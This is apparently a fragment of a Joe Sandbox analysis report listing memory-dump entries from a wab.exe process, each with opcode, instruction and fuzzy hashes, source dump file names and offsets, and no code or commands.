                                              • Opcode Fuzzy Hash: fcec8e8fa3158686c79fecf994c16702ec19f5a579e8ea8b0a84863b82ef2b6e
                                              • Instruction Fuzzy Hash: 96014031A013159FCB25EFB984643AE7BFAEB89650F251479D809E7301E736C8818BD5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 453b53851f5207083b96914068fea0e44634d8e7cedee6c790307c79d749c54f
                                              • Instruction ID: 24f4f5432a22a514bc6848d0033e47245336ce38c38ef15d120251f84dc83447
                                              • Opcode Fuzzy Hash: 453b53851f5207083b96914068fea0e44634d8e7cedee6c790307c79d749c54f
                                              • Instruction Fuzzy Hash: D9F08C35B0021C9FDB00CBA8D844BEEB7F5FBC8326F1482A5E519A7294C73598118BA0
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c9262b5f013c53c5a4ba98d610a722692270c114e9c9cfafc17be71345275b22
                                              • Instruction ID: f9febe70e95426fdeff4773a85e103f4532e21bd6e18483c52354d2871e0ac06
                                              • Opcode Fuzzy Hash: c9262b5f013c53c5a4ba98d610a722692270c114e9c9cfafc17be71345275b22
                                              • Instruction Fuzzy Hash: D9014474925248DFDB01FFB8D95155D77F5AF82B00F9041BDD04AAB290EB315E0ACB91
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 124e10834011fb902d5611db14306583d3105ee33faa77fb05d36022683ded54
                                              • Instruction ID: 0e049c00a51a5a7e69d6a125307ea9998563ffec655e5a5d343e46c48341e723
                                              • Opcode Fuzzy Hash: 124e10834011fb902d5611db14306583d3105ee33faa77fb05d36022683ded54
                                              • Instruction Fuzzy Hash: 4C010871D00308CFEF10DFA8D8687DDBBB9AF48308F288419D415A7291CB789894CB91
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3c6be2330f856525ccfc21a9594eabacc755947a3feea744e4e79ba32bab194d
                                              • Instruction ID: a9db15e800052dabf6b6a7f68adc5ad7c1cb30b778d2da977324d1738b31e2cc
                                              • Opcode Fuzzy Hash: 3c6be2330f856525ccfc21a9594eabacc755947a3feea744e4e79ba32bab194d
                                              • Instruction Fuzzy Hash: C3F03130921249DFDB00FFB8D95159D77F5ABC5B00F9041A9D04AA7290DF316F0ACB91
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c8146c77ef87e8e9b5e6e5158ae5adcc8a716bcdc104bdbf35a3b7cdb346fbc7
                                              • Instruction ID: 859f0cb01f57edc0660f57fc366b9656160fba230a71cd032d0aa015152874e9
                                              • Opcode Fuzzy Hash: c8146c77ef87e8e9b5e6e5158ae5adcc8a716bcdc104bdbf35a3b7cdb346fbc7
                                              • Instruction Fuzzy Hash: 1DE01A71E0021D9B8B50DEBD99012AA7AF8EB48250F108476D809E7600E732C6008BD1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_29a0000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e4a71e02c8665e520d0af94c7f2da29280365ea5cd44086bf69edb55d6a6f3c
                                              • Instruction ID: 325bd836c326f0ce92f3d6decf150017636b41c8358d84d65b2fcbbcb6c6c07a
                                              • Opcode Fuzzy Hash: 2e4a71e02c8665e520d0af94c7f2da29280365ea5cd44086bf69edb55d6a6f3c
                                              • Instruction Fuzzy Hash: 6BC002363541544FC5059768E06447977B5DBCA56935401D6D159CB761CE1558029B40